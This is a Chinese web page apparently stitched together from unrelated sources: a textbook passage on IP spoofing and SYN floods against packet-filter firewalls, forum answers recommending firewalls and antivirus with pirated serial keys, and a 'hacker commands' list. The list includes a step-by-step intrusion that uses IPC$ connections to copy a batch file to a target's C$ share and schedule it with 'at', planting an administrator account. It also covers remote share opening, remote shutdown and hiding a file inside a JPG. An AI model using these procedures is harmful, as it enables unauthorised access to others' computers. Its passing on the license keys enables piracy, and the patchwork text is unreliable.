( 3)黑客攻击包过滤防火墙的常用手段。 “ I P 地址欺骗”是黑

客比较常用的一种攻击手段。黑客们 包过滤防火墙发出一系列信息

包 ，这些包中的l P 地址已经被替换为一串顺序的I P 地址，一旦有一个

包通过了防火墙，黑客便可以用这个I P 地址来伪装他们发出的信息。

攻击者向被攻击的计算机发出许许多多个虚假的 “ 同步请求”信息

包 ，目标计算机响应了这种信息包后会等待请求发出者的应答．而攻

击者却不做任何回应 ，服务器在一定时间里没有收到响应信号的话就

会结束这次请求连接 ，但是当服务器在遇到成千上万个虚假请求时，

它便没有能力来处理正常的用户服务请求，处于这种攻下的服务器表 现为性能下降，服务响应时间变长，严重时服务完全停止甚至死机。

但是 ，如果防火墙能结合接口，地址来匹配，这种攻击就不能成功。

4 包过滤技术的优缺点及其发展趋势

随着网络应用的增加，对网络带宽提出了更高的要求。这意味着

防火墙要能够以非常高的速率处理数据。为了满足这种需要，一些防

火墙制造商开发了基于AS I C 的防火墙和基于网络处理器的防火墙。

从执行速度的角度看来 ，基于网络处理器的防火墙也是基于软件的解

决方案，它需要在很大程度上依赖于软件的性能，但是由于这类防火

墙中有一些专门用于处理数据层面任务的引擎，从而减轻了C P U的负

担 ，该类防火墙的性能要比传统防火墙的性能好许多。

怎样防止自己的计算机不被黑客攻击

【希望贵机早日恢复正常】 Comodo Firewall Pro 3.0 Comodo Firewall是一款功能强大的、高效的且容易使用的，提供了针对网络和个人用户的最高级别的保护，从而阻挡黑客的进入和个人资料的泄露。 世界第一名个人版防火墙 还是免费的 但是最新版本没有中文版 最新Matousec防火墙測試排名(2008/05/17)Comodo继续第一 官方网站: 评测网址： PC Tools Firewall Plus v4.0.0.40 Final 多国语言版(有中文) PC Tools Firewall Plus 是一款强大并免费的Windows 系统个人防火墙，防止未经授权的用户从互联网或网络进行入侵，保护您的电脑。Firewall Plus监控连接到网络的应用程序，能防止木马、后门、键盘监控和其他恶意程序破坏电脑、窃取私人信息。 官方下载： 安装完之后按注册就可以免费获得序列号 只要阅读《防毒真經》就可以远离盗号，黑客攻击，系统破坏，广告满天飞，木马病毒杀不完之困扰。只要多加修炼 必能横行互联网。 【根本解決之道,不信依舊中毒!】 〓引言〓 您是不是感觉病毒杀完又出来,总是杀不净?杀毒软件被关闭? 被入侵? 您是不是天天为杀毒烦恼?人心憔悴?你愤怒盗号者?讨厌病毒吗? 您是不是感觉杀毒软件排名很高，但是实际使用确实一般呢。 这是因为阻止病毒加载能力弱，所以出现反复查杀的情况! 从现在开始拒绝病毒木马，互联网安全自我做起。 然而杀毒排名并不会考虑到阻止病毒加载能力这个因素，不会作为排名标准，所以排名就是只是扫描静态病毒测试。 杀毒--吸取教训--学习知识--永不中毒 这个才是正确的 杀毒--利用别的给你的具体方法照猫画虎-再次中毒-循环 是跳不出的怪圈 【杀毒排名是给人个用户的迷魂汤】 杀毒市场的泡沫，靠提高排名来扩大自己的市场，但是企业不吃这一套。排名前几名没有一个是在企业级能带来巨大影响的 杀毒排名并不会考虑到阻止病毒加载能力这个因素，不会作为排名标准，所以排名就是只是扫描静态病毒测试。 他们都还是在走传统的路,但像McAfee企业版早已有了Generic Buffer Overflow Protection（缓冲区溢位保护） 没有一个杀毒测试是在测这个的。 〓正文〓 《防毒真經》 （虽然是复制的，但是是我原创，只要问的问题相同就在要复制相同答案，因为一本教科书印刷只用一套模板印刷。） 【杀毒软件皆装全 中毒还要找专杀 中毒依旧是为何 只因理念没转变 不想中毒满头汗 学习知识不间断 防御病毒来入侵 永不中毒金不换】 不能把计算机安全寄托于一个杀毒软件，这种软件是不存在的。企业版相对个人版安全些，但是也要复杂的操作。 对系统没有了解 就算安装世界全部的杀毒软件一样会中毒，对系统了解的不安装杀毒中毒几率也很低。 只要把系统了解了 自然就少中毒了。这是首要目的了解系统运作。靠一些小技巧是靠不住的 就算这次别人给你方法照猫画虎搞定了 下次还要问。 想要彻底不中毒并不容易 除非你学习了。 人人都凭几句话就能彻底避免中毒， 那么就不可能有病毒流行，也没有存在的意义。正是因为大部分用户并不是计算机行业或者不是很懂计算机，造成安全意识不强，病毒才得以传播有价值。 【快速成为安全专家3步曲】【第一步学习原理】【第二部找杀毒软件】【第三步McAfee规则杀毒防毒之终极大法】 【第一步学习原理】 《Windows安全原理与技术》[AVI] 《病毒防护技巧－东方标准－高显嵩主讲》avi 《计算机病毒与维护1-12》[美河原创][西安电子科技大学] 《吉大-计算机维护与维修》视频版 《计算机病毒与木马程序剖析》 《上海交大网络安全》[RMVB] 计算机精选技巧5000篇 一套非常值得收藏的精品教程 含多方面电脑知识 【第二部找杀毒软件】 强烈推荐企业版杀毒，McAfee企业版或者Symantec企业版，企业级技术让你更加安全。 McAfee企业版，Symantec企业版永久使用。没有序列号，激活的说法。 没有最强杀毒，只有最强使用者。武林高手一个树枝都是致命武器。 杀毒软件有企业版和家庭(个人)版的区别。与其找最厉害最智能的杀毒软件不如自己充电。智能永远也比不上人脑。 【节省你的银两--杀毒软件大全】特集：26种手机杀毒软件 for Symbian系统(9 MB) 包含:①金山,②McAfee(迈克菲/麦咖啡),③Syamtenc(赛门铁克)/Norton(诺顿),④卡巴斯基,⑤Avira(小红伞),⑥ESET/NOD32,⑦avast!,⑧Bitdefender,⑨Trend Micro/PC-cillin(趋势科技),⑩Panda(熊猫),⒒F-Secure,⒓F-Prot,⒔G DATA,⒕CA,⒖AVG,⒗Norman, 百度空间下载: 【第三步McAfee规则杀毒防毒法】 如果你安装了McAfee 企业版防毒软体 可以很容易搞定 不可删除/杀不完又出来的病毒/免杀病毒终结者 开启McAfee控制台-打开访问保护-右键属性-用户定义的规则-新建(F)-文件/文件夹阻止规则。 填写如下资料: (进程可带路径,可以使用通配符) 规则名称:任意 要包含的进程:* 要排除的进程:预留空(根据自己实际情况填写) 要阻止的文件或文件夹名。允许使用通配符:填上删不掉的文件名 一次只能写一个 可以多建立几个规则 要阻止的操作:除了删除 读取其他都选上。 然后再确定保存 看McAfee日志 是什么程序产生了那些文件 然后按照同样的方法把根源程序阻止 然后就能轻易删除 杀毒就是这么容易。 日志就是这么一个例子: 2008-7-18 14:12:45 将由访问保护规则 (当前不强制执行规则) 禁止 MSDN-XP\McAfee C:\DOCUME~1\McAfee\LOCALS~1\Temp\Rar$EX00.172\UXTender.exe C:\Documents and Settings\McAfee\Local Settings\Temp\Rar$EX00.172\UXTender.exe 防间谍程序最大保护:禁止所有程序从 Temp 文件夹运行文件 已阻止的操作: 执行 这个例子表明前面那个文件运行的结果就是产生那个文件。 分析你阻止的那些文件 阻止掉源头程序。(但不总是这样的，要学会分析.) 【注册表访问保护规则】(利用McAfee自定义规则防止病毒篡改首页实例) 规则名称:自己写 要包含的进程:* 要排除的进程:预留空 根据自己实际填写。可带路径 要保护的注册表项或者注册表值: 选择HKLM 填入 /SOFTWARE/Microsoft/Internet Explorer/Main/** 规则类型:项 要阻止的操作:选中“向项或值中写入”和“创建项或值” 规则名称:自己写 要包含的进程:* 要排除的进程:预留空 根据自己实际填写。可带路径 要保护的注册表项或者注册表值: 选择HKCU 填入 /Software/Microsoft/Internet Explorer/Main*/** 规则类型:项 要阻止的操作:选中“向项或值中写入”和“创建项或值” 【注册表访问保护规则】(利用McAfee自定义规则保护安全模式不被病毒篡改实例) 规则名称:自己写 要包含的进程:* 要排除的进程:预留空 根据自己实际填写。可带路径 要保护的注册表项或者注册表值: 选择HKLM 填入 /SYSTEM/ControlSet*/Control/SafeBoot/** 规则类型:项 要阻止的操作:选中“向项或值中写入”和“创建项或值”和“删除项或值”

家用电脑如何防止黑客的渗透

装防火墙

防火墙就用ZoneAlarm：

ZoneAlarmPro v5.5.114 Oem豪华中文零售版:

序列号：LMLTK-XT5RC-XHVML-ROE4W (我建议装这个版本,这是官方的简体中文版)

ZoneAlarm Pro v6.1.737 汉化版 ；

序列号：hh11s-pv5cu-batbk-1mvdqe-md0gc0 (建议关闭里面的反间谍)

要下载时看清楚，下载地址是那个“本地连接1”，不是那个“电信用户下载”“网通用户下载”别搞错了！！！！！

下载软件时，不要直接点击，而是点击右键的“使用迅雷下载”

"卡巴和ZoneAlarm同时安装后会出现冲突的情况！ 5.388以前的版本在“实时保护设置”里，把“禁用网络攻击保护”打上勾,,,,,5.388版本卡巴在设置实时保护打开后，

在网络的选项下，把“启用网络攻击实时防御”前面的钩去掉！！！这样就不会和za冲突！！！！！！"

强大的ZA尽人皆知！！！在2006年世界个人防火墙评测排名中，ZA依然世界第一！

#1 ZoneAlarm Pro

#2 Outpost Firewall Pro

#3 Norton Personal Firewall

#4 Norman Personal Firewall

#5 SurfSecret Personal Firewall

#6 McAfee Personal Firewall Plus

#7 BullGuard

#8 Sygate Personal Firewall Pro

#9 Injoy Firewall

#10 BlackICE PC Protection

#11 Personal Firewall Pro

#12 Kaspersky Anti-Hacker

#13 F-Secure Internet Security

#14 PC-cillin Internet Security

#15 Armor2net

#16 Tiny Firewall

#17 Privatefirewall

#18 Freedom Firewall

XP升级认证补丁： （下载后，打开直接点击确定就可以，接着你就可以点击开始菜单的“Windows Update”直接上微软网站打补丁！）

再下个卡巴和ewido

注册码： 6617-EBE8-D1FD-FEA2

"输入注册码后接着关掉自动更新，每次升级后得再次输入注册码"

杀毒就用卡巴最新版本： (KEY到2009年，下载后，KEY就在里面)

请问新手学黑客攻防要记哪些命令?

黑客常用命令（不太全，只是我个人常用的）、、、、、 ping 测试

ping -a ip 对目标ip地址进行反向名称解析，如果解析成功，ping将显示相应的主机名

ping IP -t 连续对IP地址执行PING命令直到CTRL+C中断

ping IP -l 3000 指定PING命令中的数据长度为3000字节

netstat( local address本地地址，foreign address外部地址)

netstat -s 查看本机网络配置信息

netstat -e 查看连接数据包

netstat -r 查看路由表的各种信息

netstat -n 显示已建立连接

netstat -v 显示正在进行的工作

netstat -t 显示TCP协议的连接情况

netstat -a 显示所有SOCKET，包括正在监听的

netstat -u 显示UDP协议的连接情况

nslookup 域名 查询A记录

nslookup -q=mx 域名 查询MX记录

nslookup -q=ns 域名 查询ns记录

ipconfig 查看自己的本地连接和宽带连接

ipconfig /all 显示IP地址MAC地址等附加信息

ipconfig /batch bak-netcfg 将有关网络配置的信息备份到文件BAK-NETCFG中

ipconfig /release 1 去除网卡（适配器1）的动态IP地址

ipconfig /renew 1 为网卡重新动态分配IP地址

tracert 解析路由

dir 列出当前路径下的文件

dir /a 列出当前路径下所有文件包含隐藏的系统的文件

dir /ah 列出当前路径下隐藏的文件包括子目录隐藏的

dir /as 列出系统文件

dir /ad 列出子目录

dir /B 只显示文件名与扩展名

nbtstat -a IP 查看指定IP主机的NETBIOS信息

COPY命令巧妙捆绑：

copy 456.jpg/b + 123.txt/a 789.jpg

首先CD命令到文件的存放位置，456.jpg--文件名，123.txt--文件名，789.jpg--生成的789图片文件。/b--用于指定以二进制格式复制合并文件，/a--用于指定以ASCLL格式复制合并文件，二进制格式文件应该在+前，文本格式文件在+后。

cls 清屏命令

net user 系统账号类操作

net user 账号 密码 /add 建立账号命令

net user 账号 密码 /dll 删除账号命令

net localgroup 系统组操作

net use 远程连接 映射操作

net use \\IP\ipc$ "密码" /user:"用户" IPC￥连接

net use z: \\IP\c$ 映射网络驱动器（C盘到本地E盘）

net use * /del 断开所有IPC连接

net use \\IP\ipc$ /del 断开指定IP目标IPC连接

net time \\IP 查看目标主机的时间

copy 把一个文件拷贝到另一个地方（参照远程添加用户）

at 用来建立计划任务（参照远程添加用户）

net user 用来管理计算机上面的帐号（参照远程添加用户）

net localgroup 用来管理工作组（参照远程添加用户）

net send 信使命令

net start messenger 开启信使服务messenger

net stop messenger 关闭服务

net * 内容 向局域网所有用户发送消息

远程添加用户：

net user 用户名 密码 /add

net localgroup administrators 用户名 /add

命令一：添加一个用户

命令二：表示把用户添加到管理员组（administrators）

打开记事本，键入上面的命令，把该文件另存为后坠名是.bat的文件（这里记为hack.bat）

转到存放hack.bat的目录（比如D盘），键入copy hack.bat \\目标IP\c$ (这样就把hack.bat拷贝到了目标主机的C盘)

首先键入：net time \\目标IP 查看目标主机的时间，再键入： at \\目标IP 时间 要执行的命令。例：at \\192.168.1.1 c:hack.bat

net share 查看本机共享资源

at \\IP 时间 net share c: 使用计划任务开启共享资源

md f:\123..\ 建立超级文件夹（F指本地磁盘，123指文件夹名）

start f:\123..\ 进入超级文件夹

rd f:\123..\ 删除超级文件夹

shutdown -i 打开（关闭计算机）界面，可关指定远程计算机

shutdown -l 注销本计算机

shutdown -s 关闭本计算机

shutdown -r 关闭并重启本计算机

shutdown -a 放弃系统关机

shutdown -m \\(计算机名或IP) -s 远程关闭计算机

shutdown -m \\(计算机名或IP) -r 远程重启计算机

shutdown -m \\(计算机名或IP) -a 远程命令放弃

shutdown -t xx 设置关闭的超时为几秒（xx表示秒）

shutdown -c "comment" 关闭注释（最大127字符）

shutdown -f 强制运行的应用程序关闭而没有警告

shutdown -d [u][p]:xx:yy 关闭原因代码（u是用户代码，p是一个计划的代码，xx是一个主要原因代码[小于256的正整数]，yy是一个次要原因代码[小于65536的正整数]）

at 22:00 Shutdown -s 22：00关机

del d:文件夹\文件名 删除文件，d:指盘符。

cd.. 进入上一层

cd (文件夹名) 进入指定的文件夹

d: 进入D盘

nbtstat -a 计算机名或IP 显示指定计算机NETBIOS信息

nbtstat -n 显示本计算机的NETBIOS信息

nbtstat -c 显示本计算机NEBIOS名称缓存的内容

arp -a Ip 如果我们有多个网卡，那么使用arp -a加上接口的Ip地址，就可以只显示与该接口相关的ARp缓存项目。

arp -s Ip MAC物理地址 绑定其他电脑MAC地址，IP为：目标IP。

arp -d Ip 人工删除一个静态项目（MAC地址）。

format d： 格式化命令，d：代表盘符

format d:/q 快速格式化

format d:/u 无条件格式化